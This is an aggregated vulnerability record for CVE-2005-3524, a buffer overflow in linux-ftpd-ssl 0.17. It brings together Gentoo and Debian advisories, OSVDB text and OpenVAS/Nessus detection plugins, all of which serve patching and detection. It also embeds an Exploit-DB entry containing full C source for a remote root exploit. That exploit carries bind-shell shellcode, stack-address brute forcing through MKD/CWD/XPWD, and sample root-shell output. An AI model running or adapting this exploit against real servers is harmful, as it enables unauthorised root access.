ID: CVE-2005-3524
Type: cve
Reporter: cve@mitre.org
Modified: 2017-07-11T01:33:00
Description
Buffer overflow in the SSL-ready version of linux-ftpd (linux-ftpd-ssl) 0.17 allows remote attackers to execute arbitrary code by creating a long directory name, then executing the XPWD command.
{"gentoo": [{"lastseen": "2016-09-06T19:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3524"], "edition": 1, "description": "### Background\n\nlinux-ftpd-ssl is the netkit FTP server with encryption support. \n\n### Description\n\nA buffer overflow vulnerability has been found in the linux-ftpd-ssl package. A command that generates an excessively long response from the server may overrun a stack buffer. \n\n### Impact\n\nAn attacker that has permission to create directories that are accessible via the FTP server could exploit this vulnerability. Successful exploitation would execute arbitrary code on the local machine with root privileges. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll ftpd users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-ftp/netkit-ftpd-0.17-r3\"", "modified": "2007-12-30T00:00:00", "published": "2005-11-13T00:00:00", "id": "GLSA-200511-11", "href": "https://security.gentoo.org/glsa/200511-11", "type": "gentoo", "title": "linux-ftpd-ssl: Remote buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2005-3524"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in linux-ftpd-ssl. The SSL code fails to validate input to the vsprintf() function resulting in a stack-based buffer overflow. With a specially crafted request which generates more than 2048 bytes of response from the server, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Technical Description\nLinux-ftpd-ssl is a source code patch which is applied to NetKit ftpd. 
This flaw is introduced by the application of the patch to NetKit ftpd, and does not exist in the underlying program.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, James Longstreet has released an unofficial patch to address this vulnerability.\n## Short Description\nA remote overflow exists in linux-ftpd-ssl. The SSL code fails to validate input to the vsprintf() function resulting in a stack-based buffer overflow. With a specially crafted request which generates more than 2048 bytes of response from the server, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://freshmeat.net/projects/linux-ftpd-ssl/\n[Secunia Advisory ID:17529](https://secuniaresearch.flexerasoftware.com/advisories/17529/)\n[Secunia Advisory ID:17465](https://secuniaresearch.flexerasoftware.com/advisories/17465/)\n[Secunia Advisory ID:17586](https://secuniaresearch.flexerasoftware.com/advisories/17586/)\nOther Advisory URL: http://www.debian.org/security/2005/dsa-896\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-11.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0131.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0138.html\n[CVE-2005-3524](https://vulners.com/cve/CVE-2005-3524)\n", "modified": "2005-11-04T05:02:59", "published": "2005-11-04T05:02:59", "href": "https://vulners.com/osvdb/OSVDB:20530", "id": "OSVDB:20530", "type": "osvdb", "title": "Linux-ftpd-ssl FTP Server Response Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3524"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200511-11.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", 
"id": "OPENVAS:55860", "href": "http://plugins.openvas.org/nasl.php?oid=55860", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200511-11 (linux-ftpd-ssl)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow vulnerability has been found, allowing a remote attacker\nto execute arbitrary code with escalated privileges on the local system.\";\ntag_solution = \"All ftpd users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-ftp/ftpd-0.17-r3'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200511-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=111573\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200511-11.\";\n\n \n\nif(description)\n{\n script_id(55860);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n 
script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(15343);\n script_cve_id(\"CVE-2005-3524\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200511-11 (linux-ftpd-ssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-ftp/ftpd\", unaffected: make_list(\"ge 0.17-r3\"), vulnerable: make_list(\"lt 0.17-r3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3524"], "description": "The remote host is missing an update to linux-ftpd-ssl\nannounced via advisory DSA 896-1.\n\nA buffer overflow has been discovered in ftpd-ssl, a simple BSD FTP\nserver with SSL encryption support, that could lead to the execution\nof arbitrary code.\n\nThe old stable distribution (woody) does not contain linux-ftpd-ssl\npackages.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:55876", "href": 
"http://plugins.openvas.org/nasl.php?oid=55876", "type": "openvas", "title": "Debian Security Advisory DSA 896-1 (linux-ftpd-ssl)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_896_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 896-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 0.17.18+0.3-3sarge1\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your ftpd-ssl package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20896-1\";\ntag_summary = \"The remote host is missing an update to linux-ftpd-ssl\nannounced via advisory DSA 896-1.\n\nA buffer overflow has been discovered in ftpd-ssl, a simple BSD FTP\nserver with SSL encryption support, that could lead to the execution\nof arbitrary code.\n\nThe old stable distribution (woody) does not contain linux-ftpd-ssl\npackages.\";\n\n\nif(description)\n{\n script_id(55876);\n script_version(\"$Revision: 6616 
$\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:03:37 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(15343);\n script_cve_id(\"CVE-2005-3524\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 896-1 (linux-ftpd-ssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ftpd-ssl\", ver:\"0.17.18+0.3-3sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:57:17", "description": "linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit. CVE-2005-3524. 
Remote exploit for linux platform", "published": "2005-11-05T00:00:00", "type": "exploitdb", "title": "linux-ftpd-ssl 0.17 MKD/CWD Remote Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3524"], "modified": "2005-11-05T00:00:00", "id": "EDB-ID:1295", "href": "https://www.exploit-db.com/exploits/1295/", "sourceData": "/*Oct2005 VER2*/\r\n/**********************************************************/\r\n/** lnxFTPDssl_warez.c **/\r\n/** linux-ftpd-ssl 0.17 remote r00t exploit by kcope **/\r\n/** for all of those who installed the ssl ready version **/\r\n/** of linux-ftpd to be more \"secure\" **/\r\n/** **/\r\n/** be aware of the buffer overflows, **/\r\n/** the code is strong cryto **/\r\n/**********************************************************/\r\n/** thanx blackzero,revoguard,wY!,net_spy **/\r\n/** Confidential. Keep Private! **/\r\n/**********************************************************/\r\n/**\r\nC:\\Dokumente und Einstellungen\\Administrator\\Desktop>telnet 192.168.2.9 21\r\n220 localhost.localdomain FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready.\r\nAUTH SSL\r\n234 AUTH SSL OK.\r\n;PpPpPPpPPPpPPPPpPppPPPPPpPpPPPpPPpPpPPpPPPpPPPPpPppPPPPPpPpPPPpP\r\nC:\\Dokumente und Einstellungen\\Administrator\\Desktop>lnxFTPDssl_warez.exe 192.168.2.9 kcope password\r\nlnxFTPDssl_warez.c\r\nlinux-ftpd-ssl 0.17 remote r00t exploit by kcope\r\n\r\nconnecting to 192.168.2.9:21... 
ok.\r\nOK - STARTING ATTACK\r\n\r\nLet's get ready to rumble!\r\nid\r\nuid=0(root) gid=0(root) 
egid=1000(kcope) groups=1000(kcope),20(dialout),24(cdrom\r\n),25(floppy),29(audio),44(video),46(plugdev)\r\nuname -a\r\nLinux debian 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux\r\n\r\n**/\r\n// Tested on Linux 2.4.18-14 Redhat 8.0\r\n// Linux 2.2.20-idepci Debian GNU 3.0\r\n// Linux 2.4.27-2-386 Debian GNU 3.1\r\n// CHECK VER3 FOR MORE SUPPORT!!!\r\n// ***KEEP IT ULTRA PRIV8***\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <sys/time.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n\r\n#define BUF_SIZ 4096\r\n#define PORT 21\r\n#define BINDPORT 30464\r\n#define STACK_START 0xbfffcc03\r\n#define STACK_END 0xbffff4f0\r\n\r\n/*my shellcode*/\r\n/*setreuid,chroot break,\r\nbind to port 30464, 0xff is double*/\r\nunsigned char lnx_bind[] =\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\xEB\\x70\\x31\\xC0\\x31\\xDB\\x31\\xC9\"\r\n\"\\xB0\\x46\\xCD\\x80\\x5E\\x90\\xB8\\xBE\"\r\n\"\\xff\\xff\\xff\\xff\\xff\\xff\\xF7\\xD0\"\r\n\"\\x89\\x06\\xB0\\x27\\x8D\\x1E\\xFE\\xC5\"\r\n\"\\xB1\\xED\\xCD\\x80\\x31\\xC0\\x8D\\x1E\"\r\n\"\\xB0\\x3D\\xCD\\x80\\x66\\xB9\\xff\\xff\"\r\n\"\\x03\\xBB\\xD2\\xD1\\xD0\\xff\\xff\\xF7\"\r\n\"\\xDB\\x89\\x1E\\x8D\\x1E\\xB0\\x0C\\xCD\"\r\n\"\\x80\\xE2\\xEF\\xB8\\xD1\\xff\\xff\\xff\"\r\n\"\\xff\\xff\\xff\\xF7\\xD0\\x89\\x06\\xB0\"\r\n\"\\x3D\\x8D\\x1E\\xCD\\x80\\x31\\xC0\\x31\"\r\n\"\\xDB\\x89\\xF1\\xB0\\x02\\x89\\x06\\xB0\"\r\n\"\\x01\\x89\\x46\\x04\\xB0\\x06\\x89\\x46\"\r\n\"\\x08\\xB0\\x66\\x43\\xCD\\x80\\x89\\xF1\"\r\n\"\\x89\\x06\\xB0\\x02\\x66\\x89\\x46\\x0C\"\r\n\"\\xEB\\x04\\xEB\\x74\\xEB\\x77\\xB0\\x77\"\r\n\"\\x66\\x89\\x46\\x0E\\x8D\\x46\\x0C\\x89\"\r\n\"\\x46\\x04\\x31\\xC0\\x89\\x46\\x10\\xB0\"\r\n\"\\x10\\x89\\x46\\x08\\xB0\\x66\\x43\\xCD\"\r\n\"\\x80\\xB0\\x01\\x89\\x46\\x04\\xB0\\x66\"\r\n\"\\xB3\\x04\\xCD\\x80\\x31\\xC0\\x89\\x46\"\r\n\"\\x04\\x89\
\x46\\x08\\xB0\\x66\\xB3\\x05\"\r\n\"\\xCD\\x80\\x88\\xC3\\xB0\\x3F\\x31\\xC9\"\r\n\"\\xCD\\x80\\xB0\\x3F\\xB1\\x01\\xCD\\x80\"\r\n\"\\xB0\\x3F\\xB1\\x02\\xCD\\x80\\xB8\\xD0\"\r\n\"\\x9D\\x96\\x91\\xF7\\xD0\\x89\\x06\\xB8\"\r\n\"\\xD0\\x8C\\x97\\xD0\\xF7\\xD0\\x89\\x46\"\r\n\"\\x04\\x31\\xC0\\x88\\x46\\x07\\x89\\x76\"\r\n\"\\x08\\x89\\x46\\x0C\\xB0\\x0B\\x89\\xF3\"\r\n\"\\x8D\\x4E\\x08\\x8D\\x56\\x0C\\xCD\\x80\"\r\n\"\\xE8\\x15\\xff\\xff\\xff\\xff\\xff\\xff\";\r\n\r\nlong ficken() {\r\n printf(\"lnxFTPDssl_warez.c\\nlinux-ftpd-ssl 0.17 remote r00t exploit by kcope\\n\\n\");\r\n return 0xc0debabe;\r\n}\r\n\r\nvoid usage(char **argv) {\r\n printf(\"Insufficient parameters given.\\n\");\r\n printf(\"Usage: %s <remotehost> <user> <pass> [writeable directory]\\n\", argv[0]);\r\n exit(0);\r\n}\r\n\r\nvoid _recv(int sock, char *buf) {\r\n int bytes=recv(sock, buf, BUFSIZ, 0);\r\n if (bytes < 0) {\r\n perror(\"read() failed\");\r\n exit(1);\r\n }\r\n}\r\n\r\nvoid attack(int sock, unsigned long ret, char *pad) {\r\n int i,k;\r\n char *x=(char*)malloc(1024);\r\n char *bufm=(char*)malloc(1024);\r\n char *bufc=(char*)malloc(1024);\r\n char *rbuf=(char*)malloc(BUFSIZ+10);\r\n char *nops=(char*)malloc(1024);\r\n unsigned char a,b,c,d;\r\n\r\n memset(nops,0,1024);\r\n memset(nops,0x90,255);\r\n memset(x,0,1024);\r\n for (i=0,k=0;i<60;i++) {\r\n a=(ret >> 24) & 0xff;\r\n b=(ret >> 16) & 0xff;\r\n c=(ret >> 8) & 0xff;\r\n d=(ret) & 0xff;\r\n\r\n if (d==255) {\r\n x[k]=d;\r\n x[++k]=255;\r\n } else {\r\n x[k]=d;\r\n }\r\n\r\n if (c==255) {\r\n x[k+1]=c;\r\n x[++k+1]=255;\r\n } else {\r\n x[k+1]=c;\r\n }\r\n\r\n if (b==255) {\r\n x[k+2]=b;\r\n x[++k+2]=255;\r\n } else {\r\n x[k+2]=b;\r\n }\r\n\r\n if (a==255) {\r\n x[k+3]=a;\r\n x[++k+3]=255;\r\n } else {\r\n x[k+3]=a;\r\n }\r\n\r\n k+=4;\r\n }\r\n\r\n snprintf(bufm, 1000, \"MKD %s%s\\r\\n\", pad, x); // 1x'A' redhat 8.0 / 2x'A' debian gnu 3.0 / 3x'A' debian gnu 3.1\r\n snprintf(bufc, 1000, \"CWD %s%s\\r\\n\", pad, x);\r\n for (i=0; 
i<11; i++) {\r\n send(sock, bufm, strlen(bufm), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n send(sock, bufc, strlen(bufc), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n }\r\n\r\n for (i=0; i<2; i++) {\r\n snprintf(bufm, 1000, \"MKD %s\\r\\n\", lnx_bind);\r\n snprintf(bufc, 1000, \"CWD %s\\r\\n\", lnx_bind);\r\n send(sock, bufm, strlen(bufm), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n send(sock, bufc, strlen(bufc), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n\r\n snprintf(bufm, 1000, \"MKD %s\\r\\n\", nops);\r\n snprintf(bufc, 1000, \"CWD %s\\r\\n\", nops);\r\n send(sock, bufm, strlen(bufm), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n send(sock, bufc, strlen(bufc), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n }\r\n\r\n send(sock, \"XPWD\\r\\n\", strlen(\"XPWD\\r\\n\"), 0);\r\n\r\n free(bufm);\r\n free(bufc);\r\n free(x);\r\n free(rbuf);\r\n}\r\n\r\nint do_remote_shell(int sockfd)\r\n{\r\n while(1)\r\n {\r\n fd_set fds;\r\n FD_ZERO(&fds);\r\n FD_SET(0,&fds);\r\n FD_SET(sockfd,&fds);\r\n if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))\r\n {\r\n int cnt;\r\n char buf[1024];\r\n if(FD_ISSET(0,&fds))\r\n {\r\n if((cnt=read(0,buf,1024))<1)\r\n {\r\n if(errno==EWOULDBLOCK||errno==EAGAIN)\r\n continue;\r\n else\r\n break;\r\n }\r\n write(sockfd,buf,cnt);\r\n }\r\n if(FD_ISSET(sockfd,&fds))\r\n {\r\n if((cnt=read(sockfd,buf,1024))<1)\r\n {\r\n if(errno==EWOULDBLOCK||errno==EAGAIN)\r\n continue;\r\n else\r\n break;\r\n }\r\n write(1,buf,cnt);\r\n }\r\n }\r\n }\r\n}\r\n\r\nint do_connect (char *remotehost, int port) {\r\n struct hostent *host;\r\n struct sockaddr_in addr;\r\n int s;\r\n\r\n if (!inet_aton(remotehost, &addr.sin_addr))\r\n {\r\n host = gethostbyname(remotehost);\r\n if (!host)\r\n {\r\n perror(\"gethostbyname() failed\");\r\n return -1;\r\n }\r\n addr.sin_addr = *(struct in_addr*)host->h_addr;\r\n }\r\n\r\n s = socket(PF_INET, SOCK_STREAM, 0);\r\n if (s == -1)\r\n {\r\n perror(\"socket() failed\");\r\n return -1;\r\n }\r\n\r\n addr.sin_port = htons(port);\r\n addr.sin_family = 
AF_INET;\r\n\r\n if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)\r\n {\r\n if (port == PORT) perror(\"connect() failed\");\r\n return -1;\r\n }\r\n\r\n return s;\r\n}\r\n\r\nvoid do_login(int s, char *buf, char *sendbuf, char *user, char *pass) {\r\n memset(buf, 0, sizeof(buf));\r\n memset(sendbuf, 0, sizeof(sendbuf));\r\n do {\r\n _recv(s, buf);\r\n } while (strstr(buf, \"220 \") == NULL);\r\n snprintf(sendbuf, BUFSIZ, \"USER %s\\r\\n\", user);\r\n send(s, sendbuf, strlen(sendbuf), 0);\r\n do {\r\n _recv(s, buf);\r\n } while (strstr(buf, \"331 \") == NULL);\r\n\r\n snprintf(sendbuf, BUFSIZ, \"PASS %s\\r\\n\", pass);\r\n send(s, sendbuf, strlen(sendbuf), 0);\r\n do {\r\n _recv(s, buf);\r\n } while (strstr(buf, \"230 \") == NULL);\r\n}\r\n\r\nint main(int argc, char **argv) {\r\n char remotehost[255];\r\n char user[255];\r\n char pass[255];\r\n char pad[10];\r\n char *buf,*sendbuf;\r\n int stackaddr=STACK_START;\r\n int s,sr00t,i;\r\n\r\n ficken();\r\n if (argc < 4)\r\n usage(argv);\r\n\r\n strncpy(remotehost, argv[1], sizeof(remotehost));\r\n remotehost[sizeof(remotehost)-1]=0;\r\n strncpy(user, argv[2], sizeof(user));\r\n user[sizeof(user)-1]=0;\r\n strncpy(pass, argv[3], sizeof(pass));\r\n pass[sizeof(pass)-1]=0;\r\n\r\n printf(\"connecting to %s:%d...\", remotehost, PORT);\r\n fflush(stdout);\r\n\r\n s=do_connect(remotehost, PORT);\r\n\r\n puts(\" ok.\");\r\n buf=(char*)malloc(BUFSIZ+10);\r\n sendbuf=(char*)malloc(BUFSIZ+10);\r\n do_login(s, buf, sendbuf, user, pass);\r\n\r\n if (strstr(buf, \"230\")!=NULL) {\r\n printf(\"OK - STARTING ATTACK\\n\");\r\n i=0;\r\n while (stackaddr <= STACK_END) {\r\n printf(\"+++ USING STACK ADDRESS 0x%.08x +++\\n\", stackaddr);\r\n\r\n sleep(1);\r\n\r\n if (i==1) {\r\n strcpy(pad, \"A\");\r\n }\r\n\r\n if (i==2) {\r\n strcpy(pad, \"AA\");\r\n }\r\n\r\n if (i==3) {\r\n strcpy(pad, \"AAA\");\r\n i=0;\r\n }\r\n\r\n attack(s, stackaddr, pad);\r\n close(s);\r\n s=do_connect(remotehost, PORT);\r\n do_login(s, buf, sendbuf, 
user, pass);\r\n\r\n if (argv[4] != NULL) {\r\n snprintf(sendbuf, BUFSIZ, \"CWD %s\\r\\n\", argv[4]);\r\n send(s, sendbuf, strlen(sendbuf), 0);\r\n recv(s, buf, BUFSIZ, 0);\r\n }\r\n\r\n if((sr00t=do_connect(remotehost, BINDPORT)) > 0) {\r\n /* XXX Remote r00t */\r\n printf(\"\\nLet's get ready to rumble!\\n\");\r\n do_remote_shell(sr00t);\r\n exit(0);\r\n }\r\n\r\n stackaddr+=16;\r\n i++;\r\n }\r\n } else {\r\n printf(\"\\nLogin incorrect\\n\");\r\n exit(1);\r\n }\r\n\r\n free(buf);\r\n free(sendbuf);\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2005-11-05]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1295/"}], "debian": [{"lastseen": "2020-11-11T13:23:53", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3524"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 896-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nNovember 15th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : linux-ftpd-ssl\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2005-3524\nDebian Bug : 339074\n\nA buffer overflow has been discovered in ftpd-ssl, a simple BSD FTP\nserver with SSL encryption support, that could lead to the execution\nof arbitrary code.\n\nThe old stable distribution (woody) does not contain linux-ftpd-ssl\npackages.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 0.17.18+0.3-3sarge1\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your ftpd-ssl package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line 
for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2005-11-15T00:00:00", "published": "2005-11-15T00:00:00", "id": "DEBIAN:DSA-896-1:67008", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00294.html", "title": "[SECURITY] [DSA 896-1] New ftpd-ssl packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T10:52:00", "description": "The remote host is affected by the vulnerability described in GLSA-200511-11\n(linux-ftpd-ssl: Remote buffer overflow)\n\n A buffer overflow vulnerability has been found in the\n linux-ftpd-ssl package. A command that generates an excessively long\n response from the server may overrun a stack buffer.\n \nImpact :\n\n An attacker that has permission to create directories that are\n accessible via the FTP server could exploit this vulnerability.\n Successful exploitation would execute arbitrary code on the local\n machine with root privileges.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2005-11-15T00:00:00", "title": "GLSA-200511-11 : linux-ftpd-ssl: Remote buffer overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3524"], "modified": "2005-11-15T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:netkit-ftpd", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200511-11.NASL", "href": "https://www.tenable.com/plugins/nessus/20198", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200511-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20198);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-3524\");\n script_xref(name:\"GLSA\", value:\"200511-11\");\n\n script_name(english:\"GLSA-200511-11 : linux-ftpd-ssl: Remote buffer overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200511-11\n(linux-ftpd-ssl: Remote buffer overflow)\n\n A buffer overflow vulnerability has been found in the\n linux-ftpd-ssl package. A command that generates an excessively long\n response from the server may overrun a stack buffer.\n \nImpact :\n\n An attacker that has permission to create directories that are\n accessible via the FTP server could exploit this vulnerability.\n Successful exploitation would execute arbitrary code on the local\n machine with root privileges.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200511-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All ftpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-ftp/netkit-ftpd-0.17-r3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:netkit-ftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n 
